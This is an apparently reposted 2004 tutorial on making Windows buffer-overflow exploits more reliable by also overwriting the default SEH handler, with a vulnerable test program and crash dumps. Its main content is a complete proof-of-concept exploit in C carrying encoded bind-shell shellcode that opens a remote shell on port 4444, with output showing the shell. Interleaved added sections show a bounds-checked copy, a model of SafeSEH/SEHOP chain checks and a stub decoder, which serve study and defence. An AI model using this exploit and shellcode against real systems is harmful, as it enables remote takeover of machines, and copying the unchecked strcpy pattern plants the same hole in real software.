Exploiting Default Exception Handler to Increase Exploit Sta

Posted by 韩冰 on 2004-11-19 10:39

The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address; in this case we keep overwriting the stack past it and overwrite the default exception handler as well.

[Buf]                 <- Shellcode
[Return Address]      <- jmp register (for Windows XP SP1)
[Various Stack Data]  <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler]          <- jmp register (for Win2k SP4)
[Stage1 Shellcode]    <- stage1 shellcode for Win2k

If the first return address (the Windows XP SP1 one) is wrong, an exception occurs and the default exception handler, which we have overwritten with the Windows 2000 SP4 address, is called. This lets us create a stable exploit that carries two return addresses.

Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac

Vulnerable Code:
//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }

    strcpy(buf,argv[1]); // unbounded copy of argv[1] into a 512-byte stack buffer
    return 0x0;
}
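The overflow comes from the unbounded strcpy() into the 512-byte stack buffer. As an added example (not part of the original post), here is the same copy written with the length check that is missing; copy_arg(), run_lamebuf_safe() and the error handling are assumptions for this example, not a fix the author published. With it, the 1600-byte argument used in the next section is refused before anything past buf[] is touched.

```c
/* Added example, not from the original post: lamebuf.c's copy with the
 * missing bounds check. copy_arg() and run_lamebuf_safe() are names chosen
 * for this example. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 512   /* same size as buf[] in lamebuf.c */

/* Copies src into dst only if it fits together with its terminator.
 * Returns 0 on success, -1 if src is dst_size bytes or longer (or on bad arguments).
 * The search for the terminator never looks past dst_size bytes of src. */
int copy_arg(char *dst, size_t dst_size, const char *src) {
    const char *end;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    end = memchr(src, '\0', dst_size);          /* terminator within what could fit? */
    if (end == NULL)
        return -1;                              /* no room for the NUL: reject, do not truncate silently */
    memcpy(dst, src, (size_t)(end - src) + 1);  /* copy including the NUL */
    return 0;
}

/* The lamebuf.c main() body with copy_arg() in place of strcpy().
 * Returns copy_arg()'s verdict so the result can be checked programmatically. */
int run_lamebuf_safe(const char *arg) {
    char buf[BUF_SIZE];
    int rc = copy_arg(buf, sizeof(buf), arg);
    if (rc != 0)
        fprintf(stderr, "argument rejected: longer than %d bytes\n", BUF_SIZE - 1);
    return rc;
}

int main(int argc, char *argv[]) {
    if (argc != 2) return -1;
    return run_lamebuf_safe(argv[1]);
}
```

Rejecting rather than truncating matters here: a silent strncpy()-style cut would keep the program running on malformed input, while the explicit error makes the oversized argument visible in logs.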

Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashes with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:

0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.

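What stops this on a hardened system is that the exception dispatcher validates the registration chain before calling a handler. The following is an added example, not from the original post and not Windows source, that models in simplified form the two checks SafeSEH and SEHOP add: the handler must be one that a loaded module registered, and the chain must walk upward through the stack and end in the default handler. The record layout, stack range and registered handler values are constructed for the example; the overwritten record mirrors the 0x41414141 values in the stack dump above, and the third case uses the 0x77F92A9B ntdll address chosen later in the post to show why a registered-handler list, not a module range, is needed.

```c
/* Added example, not from the original post: a simplified model of SafeSEH/SEHOP
 * style validation of the SEH chain. seh_record, seh_policy, chain_is_sane() and
 * all addresses below are constructed for this example. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SEH_END 0xFFFFFFFFu   /* terminator stored in the last record's next field */

typedef struct {
    uint32_t addr;            /* stack address of this registration record */
    uint32_t next;            /* pointer to the next record, or SEH_END */
    uint32_t handler;         /* handler code pointer */
} seh_record;

typedef struct {
    uint32_t stack_lo, stack_hi;    /* [lo, hi): the thread's stack */
    const uint32_t *registered;     /* handlers the loaded modules registered (SafeSEH table) */
    size_t nregistered;
    uint32_t final_handler;         /* the default handler the chain must end in (SEHOP) */
} seh_policy;

static const seh_record *find_record(const seh_record *recs, size_t n, uint32_t addr) {
    size_t i;
    for (i = 0; i < n; i++)
        if (recs[i].addr == addr) return &recs[i];
    return NULL;
}

static int is_registered(uint32_t handler, const seh_policy *p) {
    size_t i;
    for (i = 0; i < p->nregistered; i++)
        if (p->registered[i] == handler) return 1;
    return 0;
}

/* Walks the chain from head. Returns 1 if every record is acceptable, 0 on the
 * first violation: record off the stack or misaligned, handler not registered,
 * chain not moving toward the stack base, loop, or chain not ending in the default handler. */
int chain_is_sane(const seh_record *recs, size_t n, uint32_t head, const seh_policy *p) {
    uint32_t cur = head;
    size_t hops = 0;
    const seh_record *r = NULL;
    while (cur != SEH_END) {
        if (++hops > n) return 0;                                        /* loop or runaway chain */
        if (cur < p->stack_lo || cur >= p->stack_hi || (cur & 3) != 0) return 0;
        r = find_record(recs, n, cur);
        if (r == NULL) return 0;
        if (!is_registered(r->handler, p)) return 0;                     /* SafeSEH-style check */
        if (r->next != SEH_END && r->next <= cur) return 0;              /* must move up the stack */
        cur = r->next;
    }
    return r != NULL && r->handler == p->final_handler;                 /* SEHOP-style check */
}

/* Constructed policy: one application handler plus the default handler. */
static const uint32_t registered_handlers[] = { 0x00401200u, 0x77F7B000u };
static const seh_policy policy = { 0x00120000u, 0x00130000u, registered_handlers, 2, 0x77F7B000u };

int example_intact_chain(void) {
    const seh_record recs[] = {
        { 0x0012FF40u, 0x0012FFB0u, 0x00401200u },   /* application frame handler */
        { 0x0012FFB0u, SEH_END,     0x77F7B000u },   /* default handler at the stack end */
    };
    return chain_is_sane(recs, 2, 0x0012FF40u, &policy);
}

int example_overwritten_chain(void) {
    /* The record as it appears in the crash dump above: both fields are 0x41414141. */
    const seh_record recs[] = { { 0x0012FFB0u, 0x41414141u, 0x41414141u } };
    return chain_is_sane(recs, 1, 0x0012FFB0u, &policy);
}

int example_module_gadget(void) {
    /* next field holding a short-jump encoding, handler pointing into ntdll but
     * not at a registered handler: a module-range check alone would accept this. */
    const seh_record recs[] = { { 0x0012FFB0u, 0xCCCC06EBu, 0x77F92A9Bu } };
    return chain_is_sane(recs, 1, 0x0012FFB0u, &policy);
}

int main(void) {
    printf("intact chain:      %d\n", example_intact_chain());
    printf("overwritten chain: %d\n", example_overwritten_chain());
    printf("module gadget:     %d\n", example_module_gadget());
    return 0;
}
```

The third case is the important one for this post: the address the exploit puts in the SE Handler slot is valid ntdll code, so only an exact registered-handler list (what SafeSEH compiles into /SAFESEH images) or the chain-walk to the final handler (SEHOP) rejects it.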
Primary Return Address (Windows XP SP1 EN):
The first return address is called as in a normal stack overflow. We can see that esp points to user input, so we will use that as our first-stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 EN), and our first-stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"

Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address is called as in a normal SEH overwrite. The return address will be 0x77F92A9B (jmp ebx on Win2k SP4 EN), and our first-stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
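An analyst who recovers these stubs from a crash dump will want to read them before looking at the main payload. The following added example (not from the original post) decodes the few x86 opcodes the two stubs use and totals the stack-pointer adjustment each performs; decode_one(), decode_stub() and pivot_delta() are names chosen for this example. It shows that the Windows XP stub copies esp into ecx, subtracts 0x600 with six dec ch, moves the result back into esp and jumps there, which with the offsets used later in the post lands in the NOP area before the return address, and that the Windows 2000 stub does the same starting from eax with a 0x300 adjustment.

```c
/* Added example, not from the original post: a decoder for the x86 subset
 * used by the two stage-1 stubs. decode_one(), decode_stub() and
 * pivot_delta() are names chosen for this example. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* The two stubs exactly as quoted in the post. */
static const unsigned char stage1_xp[]  = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
static const unsigned char stage1_w2k[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

static const char *reg32[8] = { "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi" };
static const char *reg8[8]  = { "al", "cl", "dl", "bl", "ah", "ch", "dh", "bh" };

/* Decodes one instruction at p into out. Handles only the register forms of
 * mov r/m32,r32 (89 /r), dec r/m8 (FE /1), jmp r/m32 (FF /4) and jmp short (EB rel8).
 * Returns the bytes consumed, or 0 if the opcode is outside that subset. */
int decode_one(const unsigned char *p, size_t len, char *out, size_t outsz) {
    unsigned char mod, reg, rm;
    if (len < 2) return 0;
    if (p[0] == 0xEB) {
        snprintf(out, outsz, "jmp short %+d", (int)(signed char)p[1]);
        return 2;
    }
    mod = p[1] >> 6; reg = (p[1] >> 3) & 7; rm = p[1] & 7;   /* ModRM fields */
    if (mod != 3) return 0;                                  /* memory operands: not needed here */
    if (p[0] == 0x89)             { snprintf(out, outsz, "mov %s, %s", reg32[rm], reg32[reg]); return 2; }
    if (p[0] == 0xFE && reg == 1) { snprintf(out, outsz, "dec %s", reg8[rm]);  return 2; }
    if (p[0] == 0xFF && reg == 4) { snprintf(out, outsz, "jmp %s", reg32[rm]); return 2; }
    return 0;
}

/* Decodes a whole stub into a newline-separated listing.
 * Returns the instruction count, or -1 if a byte is not decodable or the buffer is too small. */
int decode_stub(const unsigned char *p, size_t len, char *listing, size_t sz) {
    size_t off = 0, used = 0;
    int count = 0, n, w;
    char insn[32];
    listing[0] = '\0';
    while (off < len) {
        n = decode_one(p + off, len - off, insn, sizeof insn);
        if (n == 0) return -1;
        w = snprintf(listing + used, sz - used, "%s\n", insn);
        if (w < 0 || (size_t)w >= sz - used) return -1;
        used += (size_t)w;
        off += (size_t)n;
        count++;
    }
    return count;
}

/* Sums the adjustment the stub applies through "dec ch" (each one is -256 on ecx).
 * Returns 0 if the stub cannot be decoded. */
long pivot_delta(const unsigned char *p, size_t len) {
    size_t off = 0;
    long delta = 0;
    int n;
    char insn[32];
    while (off < len) {
        n = decode_one(p + off, len - off, insn, sizeof insn);
        if (n == 0) return 0;
        if (strcmp(insn, "dec ch") == 0) delta -= 256;
        off += (size_t)n;
    }
    return delta;
}

int main(void) {
    char listing[256];
    decode_stub(stage1_xp, sizeof(stage1_xp) - 1, listing, sizeof listing);
    printf("Windows XP SP1 stub (delta %ld):\n%s\n", pivot_delta(stage1_xp, sizeof(stage1_xp) - 1), listing);
    decode_stub(stage1_w2k, sizeof(stage1_w2k) - 1, listing, sizeof listing);
    printf("Windows 2000 SP4 stub (delta %ld):\n%s", pivot_delta(stage1_w2k, sizeof(stage1_w2k) - 1), listing);
    return 0;
}
```

The "jmp short +6" case covers the four bytes the post places in the Pointer To Next SEH slot, which is why those bytes decode as an instruction when execution reaches them rather than as a pointer.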

Proof Of Concept:
// exploit.c
// Tal zeltzer - [Double Return] //

#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<process.h> // execve() is declared here in the Microsoft C runtime

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc,char *argv[]){
    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf,0x0,sizeof(buf));
    memset(buf,0x90,1652); // NOP sled over the whole payload area
    memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

    memcpy(&buf[1544],stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592],stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode

    *(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0],bufExe,NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.